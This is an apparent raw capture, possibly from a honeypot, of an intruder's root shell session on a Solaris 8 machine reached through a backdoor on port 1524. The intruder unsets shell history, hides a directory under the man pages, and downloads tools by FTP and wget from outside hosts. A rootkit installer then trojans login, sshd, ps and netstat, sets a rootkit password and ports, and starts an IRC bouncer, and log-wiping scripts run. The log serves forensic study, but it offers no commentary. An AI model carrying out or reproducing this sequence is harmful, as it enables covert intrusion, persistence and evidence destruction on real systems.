29/11/2002 15:36:25 61.219.90.180 -> 192.168.100.28 TCP 56709->1524

29/11/2002 15:36:37 61.219.90.180 -> 192.168.100.28 TCP 56712->1524

# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
#
wget
wget: not found
#
w
9:44am up 13 day(s), 4:24, 0 users, load average: 0.00, 0.00, 0.01
User tty login@ idle JCPU PCPU what
#
/bin/sh -i
unset HISTFILE
# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
# # # ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:
joka

get wget
get dlp
get solbnc
get iupv6sun
Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit
# ls
dlp
ipv6sun
solbnc
wget
#
chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
#
./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58-- http://62.211.66.53:80/bobzz/sol.tar.gz
=> `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]

0K -> .......... .......... .......... .......... .......... [ 2%]
50K -> .......... .......... .......... .......... .......... [ 5%]
100K -> .......... .......... .......... .......... .......... [ 8%]
150K -> .......... .......... .......... .......... .......... [ 10%]
200K -> .......... .......... .......... .......... .......... [ 13%]
250K -> .......... .......... .......... .......... .......... [ 16%]
300K -> .......... .......... .......... .......... .......... [ 19%]
350K -> .......... .......... .......... .......... .......... [ 21%]
400K -> .......... .......... .......... .......... .......... [ 24%]
450K -> .......... .......... .......... .......... .......... [ 27%]
500K -> .......... .......... .......... .......... .......... [ 29%]
550K -> .......... .......... .......... .......... .......... [ 32%]
600K -> .......... .......... .......... .......... .......... [ 35%]
650K -> .......... .......... .......... .......... .......... [ 38%]
700K -> .......... .......... .......... .......... .......... [ 40%]
750K -> .......... .......... .......... .......... .......... [ 43%]
800K -> .......... .......... .......... .......... .......... [ 46%]
850K -> .......... .......... .......... .......... .......... [ 48%]
900K -> .......... .......... .......... .......... .......... [ 51%]
950K -> .......... .......... .......... .......... .......... [ 54%]
1000K -> .......... .......... .......... .......... .......... [ 57%]
1050K -> .......... .......... .......... .......... .......... [ 59%]
1100K -> .......... .......... .......... .......... .......... [ 62%]
1150K -> .......... .......... .......... .......... .......... [ 65%]
1200K -> .......... .......... .......... .......... .......... [ 67%]
1250K -> .......... .......... .......... .......... .......... [ 70%]
1300K -> .......... .......... .......... .......... .......... [ 73%]
1350K -> .......... .......... .......... .......... .......... [ 76%]
1400K -> .......... .......... .......... .......... .......... [ 78%]
1450K -> .......... .......... .......... .......... .......... [ 81%]
1500K -> .......... .......... .......... .......... .......... [ 84%]
1550K -> .......... .......... .......... .......... .......... [ 86%]
1600K -> .......... .......... .......... .......... .......... [ 89%]
1650K -> .......... .......... .......... .......... .......... [ 92%]
1700K -> .......... .......... .......... .......... .......... [ 95%]
1750K -> .......... .......... .......... .......... .......... [ 97%]
1800K -> .......... .......... .......... .......... [100%]

09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]

#
rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
#
cd sol
sol: does not exist
#
./setup
./setup: not found
#
cd sol
sol: does not exist
#
tar -xf sol.tar.gz
# cd sol
# ./setup
bobz oN ircNet on join #privè
No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by warning
* Starting up at: 1038585350
* Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
* Checking for existing rootkits..
* Checking for existing rootkits..
* checking /etc/rc2 and /etc/rc3 for rootkits...
* Rootkits Removed from config files
* checking crond configs for rootkits...
* Rootkits Removed from crond config files
*** WARNING *** 2 suspicious files found in /dev
*** Insert Rootkit Password :
mixer
*** Using Password mixer
*** Insert Rootkit SSH Port :
5001
*** Using Port 5001
*** Insert Rootkit PsyBNC Port :
7000
*** Using Port 7000
File processed...
* Making backups... su ping du passwd find ls netstat strings ps Done.
* Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
* Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
* Starting Patcher...
* Patching...
DTSCD PATCHED
LPD PATCHED
fingerd
cmsd
ttdbserverd
sadmind
statd
rquotad
rusersd
cachefsd
bindshells
snmpXdmid
Done.

--09:56:21-- ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
=> `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)

0K -> .......... .......... ...... [100%]

09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]

Archive: 111085-02.zip
creating: 111085-02/
inflating: 111085-02/.diPatch
creating: 111085-02/SUNWcsu/
inflating: 111085-02/SUNWcsu/pkgmap
inflating: 111085-02/SUNWcsu/pkginfo
creating: 111085-02/SUNWcsu/install/
inflating: 111085-02/SUNWcsu/install/checkinstall
inflating: 111085-02/SUNWcsu/install/copyright
inflating: 111085-02/SUNWcsu/install/i.none
inflating: 111085-02/SUNWcsu/install/patch_checkinstall
inflating: 111085-02/SUNWcsu/install/patch_postinstall
inflating: 111085-02/SUNWcsu/install/postinstall
inflating: 111085-02/SUNWcsu/install/preinstall
creating: 111085-02/SUNWcsu/reloc/
creating: 111085-02/SUNWcsu/reloc/usr/
creating: 111085-02/SUNWcsu/reloc/usr/bin/
inflating: 111085-02/SUNWcsu/reloc/usr/bin/login
inflating: 111085-02/README.111085-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

PaTcH_MsG 2 Patch number 111085-02 is already applied.

Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.
--09:56:49-- ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
=> `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)

0K -> .......... .......... .......... .......... .......... [ 4%]
50K -> .......... .......... .......... .......... .......... [ 9%]
100K -> .......... .......... .......... .......... .......... [ 14%]
150K -> .......... .......... .......... .......... .......... [ 19%]
200K -> .......... .......... .......... .......... .......... [ 24%]
250K -> .......... .......... .......... .......... .......... [ 29%]
300K -> .......... .......... .......... .......... .......... [ 34%]
350K -> .......... .......... .......... .......... .......... [ 39%]
400K -> .......... .......... .......... .......... .......... [ 44%]
450K -> .......... .......... .......... .......... .......... [ 49%]
500K -> .......... .......... .......... .......... .......... [ 54%]
550K -> .......... .......... .......... .......... .......... [ 59%]
600K -> .......... .......... .......... .......... .......... [ 64%]
650K -> .......... .......... .......... .......... .......... [ 69%]
700K -> .......... .......... .......... .......... .......... [ 74%]
750K -> .......... .......... .......... .......... .......... [ 79%]
800K -> .......... .......... .......... .......... .......... [ 84%]
850K -> .......... .......... .......... .......... .......... [ 89%]
900K -> .......... .......... .......... .......... .......... [ 94%]
950K -> .......... .......... .......... .......... .......... [ 99%]
1000K -> ........ [100%]

10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]

Archive: 108949-07.zip
creating: 108949-07/
inflating: 108949-07/.diPatch
inflating: 108949-07/postbackout
creating: 108949-07/SUNWdtbas/
inflating: 108949-07/SUNWdtbas/pkgmap
inflating: 108949-07/SUNWdtbas/pkginfo
creating: 108949-07/SUNWdtbas/install/
inflating: 108949-07/SUNWdtbas/install/checkinstall
inflating: 108949-07/SUNWdtbas/install/copyright
inflating: 108949-07/SUNWdtbas/install/depend
inflating: 108949-07/SUNWdtbas/install/i.none
inflating: 108949-07/SUNWdtbas/install/patch_checkinstall
inflating: 108949-07/SUNWdtbas/install/patch_postinstall
inflating: 108949-07/SUNWdtbas/install/postinstall
inflating: 108949-07/SUNWdtbas/install/preinstall
creating: 108949-07/SUNWdtbas/reloc/
creating: 108949-07/SUNWdtbas/reloc/dt/
creating: 108949-07/SUNWdtbas/reloc/dt/lib/
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1
creating: 108949-07/SUNWdtbax/
inflating: 108949-07/SUNWdtbax/pkgmap
inflating: 108949-07/SUNWdtbax/pkginfo
creating: 108949-07/SUNWdtbax/install/
inflating: 108949-07/SUNWdtbax/install/checkinstall
inflating: 108949-07/SUNWdtbax/install/copyright
inflating: 108949-07/SUNWdtbax/install/depend
inflating: 108949-07/SUNWdtbax/install/i.none
inflating: 108949-07/SUNWdtbax/install/patch_checkinstall
inflating: 108949-07/SUNWdtbax/install/patch_postinstall
inflating: 108949-07/SUNWdtbax/install/postinstall
inflating: 108949-07/SUNWdtbax/install/preinstall
creating: 108949-07/SUNWdtbax/reloc/
creating: 108949-07/SUNWdtbax/reloc/dt/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1
inflating: 108949-07/postpatch
inflating: 108949-07/README.108949-07
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.


Installation of <SUNWdtbas> was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.


Installation of <SUNWdtbax> was successful.
Archive: 111606-02.zip
creating: 111606-02/
inflating: 111606-02/.diPatch
creating: 111606-02/SUNWftpu/
inflating: 111606-02/SUNWftpu/pkgmap
inflating: 111606-02/SUNWftpu/pkginfo
creating: 111606-02/SUNWftpu/install/
inflating: 111606-02/SUNWftpu/install/checkinstall
inflating: 111606-02/SUNWftpu/install/copyright
inflating: 111606-02/SUNWftpu/install/i.none
inflating: 111606-02/SUNWftpu/install/patch_checkinstall
inflating: 111606-02/SUNWftpu/install/patch_postinstall
inflating: 111606-02/SUNWftpu/install/postinstall
inflating: 111606-02/SUNWftpu/install/preinstall
creating: 111606-02/SUNWftpu/reloc/
creating: 111606-02/SUNWftpu/reloc/usr/
creating: 111606-02/SUNWftpu/reloc/usr/sbin/
inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd
inflating: 111606-02/README.111606-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.


Installation of <SUNWftpu> was successful.
PS Trojaned * Primary network interface is of type: hme
* Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README Done.
* psyBNC has now been configured on port 7000 (default) with no IDENT
* erasing rootkit...
./setup: test: unknown operator 16
#
./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
./startbnc
* psyBNC installed - loaded on reboot :>
#
cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by bobbino
root 167 1 0 Nov 16 ? 0:00 /usr/sbin/inetd -s
root 3325 3265 0 10:02:25 ? 0:00 grep inetd
---
Patch.....
Attivata by RyO
# #